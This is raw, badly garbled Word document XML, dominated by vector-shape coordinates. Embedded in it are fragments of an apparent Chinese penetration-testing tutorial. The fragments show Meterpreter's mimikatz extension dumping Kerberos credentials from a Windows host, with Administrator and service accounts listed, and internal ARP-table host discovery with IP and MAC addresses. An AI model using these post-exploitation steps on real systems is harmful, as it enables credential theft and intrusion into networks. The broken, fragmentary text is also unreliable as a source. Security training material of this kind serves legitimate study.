199,15107,2198,15107,2197,15107,2196,15107,2195,15107,2194,15107,2193,15107,2191,15107,2190,15107,2189,15107,2187,15107,2186,15107,2184,15107,2183,15107,2181,15107,2179,15107,2178,15107,2176,15107,2174,15107,2172,15107,2170,15107,2168,15107,2166,15107,2164,15107,2162,15107,2160,15107,2157,15107,2155,15107,2153,15107,2150,15107,2147,15107,2145,15107,2142,15107,2139,15107,2137,15107,2134,15107,2131,15107,2128,15107,2124,15107,2121,15107,2118,15107,2115,15107,2111,15107,2108,15107,2104,15107,2101,15107,2097,15107,2093,15107,2089,15107,2085,15107,2081,15107,2077,15107,2073,15107,2068,15107,2064,15107,2059,15107,2055,15107,2050,15107,2045,15107,2041,15107,2036,15107,2031,15107,2025,15107,2020,15107,2015,15107,2010,15107,2004,15107,1998,15107,1993,15107,1987,15107,1981,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15107,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15106,1975,15105,1975,15105,1975,15105,1975,15105,1975,15105,1975,15104,1975,15104,1975,15104,1975,15103,1975,15103,1975,15103,1975,15102,1975,15102,1975,15101,1975,15101,1975,15100,1975,15100,1975,15099,1975,15098,1975,15098,1975,15097,1975,15096,1975,15095,1975,15095,1975,15094,1975,15093,1975,15092,1975,15091,1975,15090,1975,15089,1975,15088,1975,15087,1975,15085,1975,15084,1975,15083,1975,15081,1975,15080,1975,15079,1975,15077,1975,15076,1975,15074,1975,15072,1975,15071,1975,15069,1975,15067,1975,15065,1975,15063,1975,15061,1975,15059,1975,15057,1975,15055,1975,15052,1975,15050,1975,15048,1975,15045,1975,15043,1975,15040,1975,15037,1975,15035,1975,15032,1975,15029,1975,15026,1975,15023,1975,15020,1975,15017,1975,15014,1975,15010,1975,15007,1975,15003,1975,15000,1975,14996,1975,14993,1975,14989,1975,14985,1975,14981,1975,14977,1975,14973,1975,14968,1975,14964,1975,14960,1975,14955,1975,14951,1975,14946,1975,14941,1975,14936,1975,14931,1975,14926,1975,14921,1975,14916,1975,14911,1975,14905,1975,14900,1975,14894,1975,14888,1975,14882,1975,14876,1975,14870,1975,14864,1975,14858,1975,14851e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:759.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,15190" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:15190;width:130;height:270" coordorigin="1950,15190" coordsize="130,270" path="m1975,15212l1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1977,15212,1977,15212,1977,15212,1977,15212,1977,15212,1978,15212,1978,15212,1978,15212,1978,15212,1979,15212,1979,15212,1979,15212,1980,15212,1980,15212,1980,15212,1981,15212,1981,15212,1981,15212,1982,15212,1982,15212,1983,15212,1983,15212,1984,15212,1984,15212,1985,15212,1986,15212,1986,15212,1987,15212,1988,15212,1988,15212,1989,15212,1990,15212,1990,15212,1991,15212,1992,15212,1993,15212,1994,15212,1995,15212,1995,15212,1996,15212,1997,15212,1998,15212,1999,15212,2000,15212,2002,15212,2003,15212,2004,15212,2005,15212,2006,15212,2008,15212,2009,15212,2010,15212,2011,15212,2013,15212,2014,15212,2016,15212,2017,15212,2019,15212,2020,15212,2022,15212,2024,15212,2025,15212,2027,15212,2029,15212,2030,15212,2032,15212,2034,15212,2036,15212,2038,15212,2040,15212,2042,15212,2044,15212,2046,15212,2048,15212,2051,15212,2053,15212,2055,15212,2057,15212,2060,15212,2062,15212,2065,15212,2067,15212,2070,15212,2072,15212,2075,15212,2078,15212,2081,15212,2083,15212,2086,15212,2089,15212,2092,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15213,2095,15213,2095,15213,2095,15213,2095,15213,2095,15214,2095,15214,2095,15214,2095,15214,2095,15215,2095,15215,2095,15215,2095,15216,2095,15216,2095,15217,2095,15217,2095,15218,2095,15218,2095,15219,2095,15219,2095,15220,2095,15221,2095,15221,2095,15222,2095,15223,2095,15224,2095,15225,2095,15225,2095,15226,2095,15227,2095,15228,2095,15229,2095,15231,2095,15232,2095,15233,2095,15234,2095,15236,2095,15237,2095,15238,2095,15240,2095,15241,2095,15243,2095,15244,2095,15246,2095,15248,2095,15250,2095,15251,2095,15253,2095,15255,2095,15257,2095,15259,2095,15261,2095,15264,2095,15266,2095,15268,2095,15271,2095,15273,2095,15276,2095,15278,2095,15281,2095,15284,2095,15286,2095,15289,2095,15292,2095,15295,2095,15298,2095,15301,2095,15305,2095,15308,2095,15311,2095,15315,2095,15318,2095,15322,2095,15326,2095,15330,2095,15333,2095,15337,2095,15341,2095,15346,2095,15350,2095,15354,2095,15359,2095,15363,2095,15368,2095,15372,2095,15377,2095,15382,2095,15387,2095,15392,2095,15397,2095,15402,2095,15408,2095,15413,2095,15419,2095,15424,2095,15430,2095,15436,2095,15442,2095,15448,2095,15454,2095,15460,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2093,15467,2093,15467,2093,15467,2093,15467,2093,15467,2092,15467,2092,15467,2092,15467,2092,15467,2091,15467,2091,15467,2091,15467,2090,15467,2090,15467,2090,15467,2089,15467,2089,15467,2089,15467,2088,15467,2088,15467,2087,15467,2087,15467,2086,15467,2086,15467,2085,15467,2084,15467,2084,15467,2083,15467,2083,15467,2082,15467,2081,15467,2080,15467,2080,15467,2079,15467,2078,15467,2077,15467,2076,15467,2075,15467,2075,15467,2074,15467,2073,15467,2072,15467,2071,15467,2070,15467,2068,15467,2067,15467,2066,15467,2065,15467,2064,15467,2063,15467,2061,15467,2060,15467,2059,15467,2057,15467,2056,15467,2054,15467,2053,15467,2051,15467,2050,15467,2048,15467,2047,15467,2045,15467,2043,15467,2041,15467,2040,15467,2038,15467,2036,15467,2034,15467,2032,15467,2030,15467,2028,15467,2026,15467,2024,15467,2022,15467,2019,15467,2017,15467,2015,15467,2013,15467,2010,15467,2008,15467,2005,15467,2003,15467,2000,15467,1998,15467,1995,15467,1992,15467,1990,15467,1987,15467,1984,15467,1981,15467,1978,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15465,1975,15465,1975,15465,1975,15465,1975,15464,1975,15464,1975,15464,1975,15463,1975,15463,1975,15463,1975,15462,1975,15462,1975,15461,1975,15461,1975,15460,1975,15460,1975,15459,1975,15458,1975,15458,1975,15457,1975,15456,1975,15456,1975,15455,1975,15454,1975,15453,1975,15452,1975,15451,1975,15450,1975,15449,1975,15448,1975,15447,1975,15446,1975,15444,1975,15443,1975,15442,1975,15440,1975,15439,1975,15437,1975,15436,1975,15434,1975,15432,1975,15431,1975,15429,1975,15427,1975,15425,1975,15423,1975,15421,1975,15419,1975,15417,1975,15415,1975,15413,1975,15410,1975,15408,1975,15405,1975,15403,1975,15400,1975,15398,1975,15395,1975,15392,1975,15389,1975,15386,1975,15383,1975,15380,1975,15377,1975,15374,1975,15370,1975,15367,1975,15364,1975,15360,1975,15356,1975,15353,1975,15349,1975,15345,1975,15341,1975,15337,1975,15333,1975,15329,1975,15324,1975,15320,1975,15315,1975,15311,1975,15306,1975,15301,1975,15296,1975,15292,1975,15286,1975,15281,1975,15276,1975,15271,1975,15265,1975,15260,1975,15254,1975,15248,1975,15242,1975,15237,1975,15230,1975,15224,1975,15218,1975,15212e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:759.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,15190" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:15190;width:130;height:270" coordorigin="2070,15190" coordsize="130,270" path="m2095,15212l2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2097,15212,2097,15212,2097,15212,2097,15212,2097,15212,2098,15212,2098,15212,2098,15212,2098,15212,2099,15212,2099,15212,2099,15212,2100,15212,2100,15212,2100,15212,2101,15212,2101,15212,2102,15212,2102,15212,2102,15212,2103,15212,2103,15212,2104,15212,2105,15212,2105,15212,2106,15212,2106,15212,2107,15212,2108,15212,2108,15212,2109,15212,2110,15212,2110,15212,2111,15212,2112,15212,2113,15212,2114,15212,2115,15212,2116,15212,2116,15212,2117,15212,2118,15212,2119,15212,2121,15212,2122,15212,2123,15212,2124,15212,2125,15212,2126,15212,2128,15212,2129,15212,2130,15212,2132,15212,2133,15212,2134,15212,2136,15212,2137,15212,2139,15212,2140,15212,2142,15212,2144,15212,2145,15212,2147,15212,2149,15212,2151,15212,2152,15212,2154,15212,2156,15212,2158,15212,2160,15212,2162,15212,2164,15212,2166,15212,2168,15212,2171,15212,2173,15212,2175,15212,2178,15212,2180,15212,2182,15212,2185,15212,2187,15212,2190,15212,2192,15212,2195,15212,2198,15212,2201,15212,2203,15212,2206,15212,2209,15212,2212,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15213,2215,15213,2215,15213,2215,15213,2215,15213,2215,15214,2215,15214,2215,15214,2215,15214,2215,15215,2215,15215,2215,15215,2215,15216,2215,15216,2215,15217,2215,15217,2215,15218,2215,15218,2215,15219,2215,15219,2215,15220,2215,15221,2215,15221,2215,15222,2215,15223,2215,15224,2215,15225,2215,15225,2215,15226,2215,15227,2215,15228,2215,15229,2215,15231,2215,15232,2215,15233,2215,15234,2215,15236,2215,15237,2215,15238,2215,15240,2215,15241,2215,15243,2215,15244,2215,15246,2215,15248,2215,15250,2215,15251,2215,15253,2215,15255,2215,15257,2215,15259,2215,15261,2215,15264,2215,15266,2215,15268,2215,15271,2215,15273,2215,15276,2215,15278,2215,15281,2215,15284,2215,15286,2215,15289,2215,15292,2215,15295,2215,15298,2215,15301,2215,15305,2215,15308,2215,15311,2215,15315,2215,15318,2215,15322,2215,15326,2215,15330,2215,15333,2215,15337,2215,15341,2215,15346,2215,15350,2215,15354,2215,15359,2215,15363,2215,15368,2215,15372,2215,15377,2215,15382,2215,15387,2215,15392,2215,15397,2215,15402,2215,15408,2215,15413,2215,15419,2215,15424,2215,15430,2215,15436,2215,15442,2215,15448,2215,15454,2215,15460,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2213,15467,2213,15467,2213,15467,2213,15467,2213,15467,2212,15467,2212,15467,2212,15467,2212,15467,2211,15467,2211,15467,2211,15467,2210,15467,2210,15467,2209,15467,2209,15467,2209,15467,2208,15467,2208,15467,2207,15467,2207,15467,2206,15467,2206,15467,2205,15467,2205,15467,2204,15467,2203,15467,2203,15467,2202,15467,2201,15467,2200,15467,2200,15467,2199,15467,2198,15467,2197,15467,2196,15467,2196,15467,2195,15467,2194,15467,2193,15467,2192,15467,2191,15467,2190,15467,2189,15467,2187,15467,2186,15467,2185,15467,2184,15467,2183,15467,2181,15467,2180,15467,2179,15467,2177,15467,2176,15467,2174,15467,2173,15467,2171,15467,2170,15467,2168,15467,2167,15467,2165,15467,2163,15467,2161,15467,2160,15467,2158,15467,2156,15467,2154,15467,2152,15467,2150,15467,2148,15467,2146,15467,2144,15467,2142,15467,2140,15467,2137,15467,2135,15467,2133,15467,2130,15467,2128,15467,2125,15467,2123,15467,2120,15467,2118,15467,2115,15467,2112,15467,2110,15467,2107,15467,2104,15467,2101,15467,2098,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15465,2095,15465,2095,15465,2095,15465,2095,15464,2095,15464,2095,15464,2095,15463,2095,15463,2095,15463,2095,15462,2095,15462,2095,15461,2095,15461,2095,15460,2095,15460,2095,15459,2095,15458,2095,15458,2095,15457,2095,15456,2095,15456,2095,15455,2095,15454,2095,15453,2095,15452,2095,15451,2095,15450,2095,15449,2095,15448,2095,15447,2095,15446,2095,15444,2095,15443,2095,15442,2095,15440,2095,15439,2095,15437,2095,15436,2095,15434,2095,15432,2095,15431,2095,15429,2095,15427,2095,15425,2095,15423,2095,15421,2095,15419,2095,15417,2095,15415,2095,15413,2095,15410,2095,15408,2095,15405,2095,15403,2095,15400,2095,15398,2095,15395,2095,15392,2095,15389,2095,15386,2095,15383,2095,15380,2095,15377,2095,15374,2095,15370,2095,15367,2095,15364,2095,15360,2095,15356,2095,15353,2095,15349,2095,15345,2095,15341,2095,15337,2095,15333,2095,15329,2095,15324,2095,15320,2095,15315,2095,15311,2095,15306,2095,15301,2095,15296,2095,15292,2095,15286,2095,15281,2095,15276,2095,15271,2095,15265,2095,15260,2095,15254,2095,15248,2095,15242,2095,15237,2095,15230,2095,15224,2095,15218,2095,1521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9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core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"mimikatz"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10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11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0053"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true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mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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23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#&lt;Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz:0x000055ae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e91ceb28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@client=#&lt;Session:meterpreter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192.168.1.119:53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(192.168.1.119)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"WIN03X64\Administrator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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@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WIN03X64"&gt;,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@name="mimikatz"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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mimikatz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kerberos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{:authid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"0;996"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:package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"Negotiate"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user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"NETWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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SERVICE"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:domain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"NT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AUTHORITY"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:password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"mod_process::getVeryBasicM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odulesListForProcess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12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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessM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emory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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{:authid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"0;44482"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:package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"NTLM"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user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""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:domain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""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:password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"mod_process::getVeryBasicModulesListForProcess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23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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B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\x02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\nn.a.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(kerberos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KO)"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}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{:authid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"0;115231"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:package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"NTLM"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r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"Administrator"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:domain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"WIN03X64"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:password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"mod_process::getVery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BasicModulesListForProcess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1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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadP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ocessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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{:a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uthid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"0;997"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:package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"Negotiate"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user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"LOCAL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SERVICE"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:domain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"NT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AUTHORITY"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:password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"mod_process::getVeryBasicModulesList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ForProcess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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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{:authid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"0;999"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package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"NTLM"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"WIN03X64$"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:domain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"WORKGROUP"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:password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"mo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d_process::getVeryBasicModulesListForProcess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2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(0x0000012b)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\xC5\x8C\x10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\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="8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6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内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网主机发现，如路由，arp等：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config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arp_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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2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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee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7f5f6b8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@ip_addr="192.168.1.1",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@mac_addr="78:44:fd:8e:91:59",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@interface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="65539"&gt;,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-48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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x00005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5aee7f5ee20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@ip_addr="192.168.1.3",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@mac_addr="28:16:ad:3b:51:78",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@inte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fa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ce="65539"&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="108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config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arp_table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ip_addr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59800"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"192.168.1.1"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config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arp_table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mac_addr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1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"78:44:fd:8e:91:59"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371.161pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,7423">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:7423" coordorigin="10402,0" coordsize="0,7423" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,12,10402,14,10402,18,10402,21,10402,25,10402,30,10402,35,10402,40,10402,46,10402,53,10402,60,10402,68,10402,77,10402,86,10402,96,10402,107,10402,118,10402,131,10402,144,10402,158,10402,173,10402,188,10402,205,10402,223,10402,241,10402,261,10402,281,10402,303,10402,326,10402,350,10402,375,10402,401,10402,428,10402,457,10402,487,10402,518,10402,550,10402,584,10402,619,10402,655,10402,693,10402,732,10402,773,10402,815,10402,859,10402,904,10402,951,10402,999,10402,1049,10402,1101,10402,1154,10402,1209,10402,1266,10402,1324,10402,1385,10402,1447,10402,1510,10402,1576,10402,1644,10402,1713,10402,1785,10402,1858,10402,1933,10402,2011,10402,2090,10402,2171,10402,2255,10402,2341,10402,2428,10402,2518,10402,2610,10402,2705,10402,2801,10402,2900,10402,3001,10402,3105,10402,3211,10402,3319,10402,3430,10402,3543,10402,3658,10402,3776,10402,3897,10402,4020,10402,4146,10402,4274,10402,4405,10402,4538,10402,4674,10402,4813,10402,4955,10402,5099,10402,5246,10402,5396,10402,5549,10402,5704,10402,5863,10402,6024,10402,6188,10402,6356,10402,6526,10402,6699,10402,6875,10402,7055,10402,7237,10402,7423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7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999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999l1517,999,1517,999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7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248.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,4970">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:4970" coordorigin="1490,2090" coordsize="8990,49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1,10484,2111,10484,2112,10484,2112,10484,2113,10484,2114,10484,2115,10484,2117,10484,2118,10484,2120,10484,2122,10484,2124,10484,2127,10484,2130,10484,2134,10484,2137,10484,2141,10484,2146,10484,2151,10484,2156,10484,2162,10484,2168,10484,2175,10484,2182,10484,2189,10484,2198,10484,2206,10484,2216,10484,2226,10484,2236,10484,2247,10484,2259,10484,2271,10484,2284,10484,2298,10484,2313,10484,2328,10484,2344,10484,2360,10484,2378,10484,2396,10484,2415,10484,2435,10484,2456,10484,2477,10484,2500,10484,2523,10484,2548,10484,2573,10484,2599,10484,2626,10484,2654,10484,2683,10484,2714,10484,2745,10484,2777,10484,2810,10484,2845,10484,2880,10484,2917,10484,2955,10484,2994,10484,3034,10484,3076,10484,3118,10484,3162,10484,3207,10484,3253,10484,3301,10484,3350,10484,3400,10484,3452,10484,3505,10484,3559,10484,3615,10484,3672,10484,3730,10484,3790,10484,3852,10484,3915,10484,3979,10484,4045,10484,4113,10484,4182,10484,4253,10484,4325,10484,4399,10484,4474,10484,4551,10484,4630,10484,4710,10484,4792,10484,4876,10484,4962,10484,5049,10484,5138,10484,5229,10484,5321,10484,5416,10484,5512,10484,5610,10484,5710,10484,5812,10484,5916,10484,6022,10484,6129,10484,6239,10484,6351,10484,6464,10484,6580,10484,6697,10484,6817,10484,6939,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10483,7063,10482,7063,10482,7063,10480,7063,10479,7063,10477,7063,10475,7063,10473,7063,10470,7063,10466,7063,10462,7063,10458,7063,10453,7063,10448,7063,10442,7063,10435,7063,10428,7063,10419,7063,10411,7063,10401,7063,10391,7063,10379,7063,10367,7063,10354,7063,10340,7063,10326,7063,10310,7063,10293,7063,10275,7063,10256,7063,10236,7063,10215,7063,10192,7063,10168,7063,10143,7063,10117,7063,10090,7063,10061,7063,10031,7063,9999,7063,9966,7063,9931,7063,9895,7063,9858,7063,9819,7063,9778,7063,9735,7063,9691,7063,9646,7063,9598,7063,9549,7063,9498,7063,9445,7063,9391,7063,9334,7063,9275,7063,9215,7063,9153,7063,9088,7063,9022,7063,8953,7063,8883,7063,8810,7063,8735,7063,8658,7063,8578,7063,8497,7063,8413,7063,8326,7063,8238,7063,8146,7063,8053,7063,7957,7063,7859,7063,7758,7063,7654,7063,7548,7063,7439,7063,7328,7063,7214,7063,7097,7063,6977,7063,6855,7063,6730,7063,6602,7063,6471,7063,6337,7063,6201,7063,6061,7063,5918,7063,5773,7063,5624,7063,5472,7063,5317,7063,5159,7063,4997,7063,4833,7063,4665,7063,4494,7063,4319,7063,4141,7063,3960,7063,3776,7063,3587,7063,3396,7063,3201,7063,3002,7063,2800,7063,2594,7063,2385,7063,2172,7063,1955,7063,1734,7063,1510,7063,1510,7063,1510,7063,1510,7063,1510,7062,1510,7062,1510,7062,1510,7062,1510,7062,1510,7061,1510,7060,1510,7060,1510,7059,1510,7057,1510,7056,1510,7054,1510,7053,1510,7051,1510,7048,1510,7045,1510,7042,1510,7039,1510,7035,1510,7031,1510,7027,1510,7022,1510,7017,1510,7011,1510,7005,1510,6998,1510,6991,1510,6983,1510,6975,1510,6966,1510,6957,1510,6947,1510,6937,1510,6925,1510,6914,1510,6901,1510,6888,1510,6874,1510,6860,1510,6845,1510,6829,1510,6812,1510,6795,1510,6776,1510,6757,1510,6738,1510,6717,1510,6695,1510,6673,1510,6649,1510,6625,1510,6600,1510,6574,1510,6546,1510,6518,1510,6489,1510,6459,1510,6428,1510,6395,1510,6362,1510,6328,1510,6292,1510,6255,1510,6218,1510,6179,1510,6138,1510,6097,1510,6055,1510,6011,1510,5966,1510,5919,1510,5872,1510,5823,1510,5772,1510,5721,1510,5668,1510,5614,1510,5558,1510,5501,1510,5442,1510,5382,1510,5321,1510,5258,1510,5193,1510,5127,1510,5060,1510,4991,1510,4920,1510,4848,1510,4774,1510,4699,1510,4622,1510,4543,1510,4462,1510,4380,1510,4296,1510,4211,1510,4124,1510,4035,1510,3944,1510,3851,1510,3757,1510,3660,1510,3562,1510,3462,1510,3360,1510,3257,1510,3151,1510,3043,1510,2934,1510,2822,1510,2708,1510,2593,1510,2475,1510,2356,1510,2234,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:248.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,4970">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:4970" coordorigin="1490,2090" coordsize="30,4970" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2112,1517,2112,1517,2113,1517,2114,1517,2115,1517,2117,1517,2118,1517,2120,1517,2122,1517,2124,1517,2127,1517,2130,1517,2134,1517,2137,1517,2141,1517,2146,1517,2151,1517,2156,1517,2162,1517,2168,1517,2175,1517,2182,1517,2189,1517,2198,1517,2206,1517,2216,1517,2226,1517,2236,1517,2247,1517,2259,1517,2271,1517,2284,1517,2298,1517,2313,1517,2328,1517,2344,1517,2360,1517,2378,1517,2396,1517,2415,1517,2435,1517,2456,1517,2477,1517,2500,1517,2523,1517,2548,1517,2573,1517,2599,1517,2626,1517,2654,1517,2683,1517,2714,1517,2745,1517,2777,1517,2810,1517,2845,1517,2880,1517,2917,1517,2955,1517,2994,1517,3034,1517,3076,1517,3118,1517,3162,1517,3207,1517,3253,1517,3301,1517,3350,1517,3400,1517,3452,1517,3505,1517,3559,1517,3615,1517,3672,1517,3730,1517,3790,1517,3852,1517,3915,1517,3979,1517,4045,1517,4113,1517,4182,1517,4253,1517,4325,1517,4399,1517,4474,1517,4551,1517,4630,1517,4710,1517,4792,1517,4876,1517,4962,1517,5049,1517,5138,1517,5229,1517,5321,1517,5416,1517,5512,1517,5610,1517,5710,1517,5812,1517,5916,1517,6022,1517,6129,1517,6239,1517,6351,1517,6464,1517,6580,1517,6697,1517,6817,1517,6939,1517,7063e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:352.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7050" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:7050;width:8990;height:370" coordorigin="1490,7050" coordsize="8990,370" path="m1510,7063l1510,7063,1510,7063,1510,7063,1510,7063,1510,7063,1510,7063,1511,7063,1512,7063,1512,7063,1514,7063,1515,7063,1517,7063,1519,7063,1521,7063,1524,7063,1528,7063,1532,7063,1536,7063,1541,7063,1546,7063,1552,7063,1559,7063,1566,7063,1575,7063,1583,7063,1593,7063,1603,7063,1615,7063,1627,7063,1640,7063,1654,7063,1668,7063,1684,7063,1701,7063,1719,7063,1738,7063,1758,7063,1780,7063,1802,7063,1826,7063,1851,7063,1877,7063,1904,7063,1933,7063,1963,7063,1995,7063,2028,7063,2063,7063,2099,7063,2136,7063,2175,7063,2216,7063,2259,7063,2303,7063,2348,7063,2396,7063,2445,7063,2496,7063,2549,7063,2604,7063,2660,7063,2719,7063,2779,7063,2841,7063,2906,7063,2972,7063,3041,7063,3112,7063,3184,7063,3259,7063,3336,7063,3416,7063,3498,7063,3582,7063,3668,7063,3757,7063,3848,7063,3941,7063,4037,7063,4136,7063,4236,7063,4340,7063,4446,7063,4555,7063,4666,7063,4780,7063,4897,7063,5017,7063,5139,7063,5264,7063,5392,7063,5523,7063,5657,7063,5793,7063,5933,7063,6076,7063,6222,7063,6370,7063,6522,7063,6677,7063,6835,7063,6997,7063,7161,7063,7329,7063,7500,7063,7675,7063,7853,7063,8034,7063,8219,7063,8407,7063,8598,7063,8793,7063,8992,7063,9194,7063,9400,7063,9609,7063,9823,7063,10039,7063,10260,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7064,10484,7064,10484,7064,10484,7064,10484,7065,10484,7065,10484,7065,10484,7066,10484,7066,10484,7066,10484,7067,10484,7067,10484,7068,10484,7068,10484,7069,10484,7070,10484,7070,10484,7071,10484,7072,10484,7073,10484,7073,10484,7074,10484,7075,10484,7076,10484,7077,10484,7078,10484,7080,10484,7081,10484,7082,10484,7083,10484,7085,10484,7086,10484,7088,10484,7089,10484,7091,10484,7093,10484,7094,10484,7096,10484,7098,10484,7100,10484,7102,10484,7104,10484,7106,10484,7109,10484,7111,10484,7113,10484,7116,10484,7119,10484,7121,10484,7124,10484,7127,10484,7130,10484,7133,10484,7136,10484,7139,10484,7142,10484,7146,10484,7149,10484,7153,10484,7156,10484,7160,10484,7164,10484,7168,10484,7172,10484,7176,10484,7180,10484,7185,10484,7189,10484,7194,10484,7199,10484,7203,10484,7208,10484,7213,10484,7218